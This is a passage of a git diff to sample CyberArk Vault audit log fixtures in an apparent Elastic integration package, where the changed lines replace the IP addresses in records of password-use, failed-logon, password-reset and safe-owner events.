Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log index 18c5b7e67fb..a74b537c1b4 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/309_undefined_user_logon.log @@ -1,5 +1,5 @@ <7>1 2021-03-08T18:31:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:31:52","IsoTimestamp":"2021-03-08T18:31:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansr","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} <7>1 2021-03-08T18:32:03Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:03","IsoTimestamp":"2021-03-08T18:32:03Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansra","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} -<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}} -<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.32.170.205"}}} -<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"34.71.250.247"}}} +<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}} +<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.13"}}} +<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log index 41f67cb2add..7763fe77b0f 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/316_reset_user_password_detailed_information.log @@ -1 +1 @@ -<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}} +<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log index f52711e43b9..2ba6ee49eb0 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/317_reset_user_password.log @@ -1 +1 @@ -<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}} +<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log index 6aee911c509..3e513ad1c03 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/32_add_owner.log @@ -1,16 +1,16 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add 